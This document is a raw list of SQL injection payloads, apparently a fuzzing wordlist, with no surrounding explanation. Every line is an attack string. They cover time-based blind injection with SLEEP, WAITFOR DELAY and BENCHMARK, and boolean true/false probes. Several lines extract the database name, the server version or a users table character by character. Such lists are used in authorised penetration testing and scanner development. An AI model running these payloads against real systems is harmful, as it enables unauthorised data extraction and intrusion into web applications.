' AND SLEEP(5)--
' AND SLEEP(5)#
' AND SLEEP(5)/*
") AND SLEEP(5)--
") AND SLEEP(5)#
') AND SLEEP(5)--
')) AND SLEEP(5)--
' OR SLEEP(5)--
' OR SLEEP(5)#
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)#
1 AND SLEEP(5)--
1 AND SLEEP(5)#
1 OR SLEEP(5)--
1 OR SLEEP(5)#
1; WAITFOR DELAY '0:0:5'--
1'; WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'--
1' WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'--
"; WAITFOR DELAY '0:0:5'--
'); WAITFOR DELAY '0:0:5'--
' AND BENCHMARK(5000000,MD5('a'))--
' AND BENCHMARK(5000000,SHA1('a'))--
1 AND BENCHMARK(5000000,MD5('a'))--
' AND (SELECT 1 FROM (SELECT SLEEP(5))x)--
' AND (SELECT 1 FROM (SELECT SLEEP(5))x)#
' AND IF(1=1,SLEEP(5),0)--
' AND IF(1=1,SLEEP(5),0)#
' AND IF(1=2,SLEEP(5),0)--
" AND IF(1=1,SLEEP(5),0)--
" AND IF(1=2,SLEEP(5),0)--
' AND IF(SUBSTRING(version(),1,1)='5',SLEEP(5),0)--
' AND IF(SUBSTRING(version(),1,1)='8',SLEEP(5),0)--
' AND IF(MID(version(),1,1)='5',SLEEP(5),0)--
' AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)--
' AND IF((SELECT username FROM users LIMIT 1)='admin',SLEEP(5),0)--
' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>64,SLEEP(5),0)--
' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>96,SLEEP(5),0)--
' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=97,SLEEP(5),0)--
' AND 1=IF(1=1,1,(SELECT 1 FROM dual UNION SELECT 2 FROM dual))--
' AND (SELECT * FROM (SELECT SLEEP(5)) AS tmp)--
' OR IF(1=1,SLEEP(5),0)--
' OR IF(1=2,SLEEP(5),0)--
' RLIKE SLEEP(5)--
1 AND 1=1--
1 AND 1=2--
1' AND '1'='1
1' AND '1'='2
1" AND "1"="1
1" AND "1"="2
1 AND ASCII(SUBSTRING((SELECT database()),1,1))>64--
1 AND ASCII(SUBSTRING((SELECT database()),1,1))>96--
1 AND ASCII(SUBSTRING((SELECT database()),1,1))=97--
1 AND SUBSTRING(version(),1,1)='5'--
1 AND SUBSTRING(version(),1,1)='8'--
1 AND (SELECT TOP 1 1 FROM sysobjects WHERE 1=1)=1--
1 AND (SELECT TOP 1 1 FROM sysobjects WHERE 1=2)=1--
1 AND EXISTS(SELECT * FROM users)--
1 AND NOT EXISTS(SELECT * FROM nonexistent_table_xyz)--
'+(SELECT '')+' AND '1'='1
'+(CASE WHEN 1=1 THEN ''  ELSE (SELECT 1 UNION SELECT 2) END)+' AND '1'='1
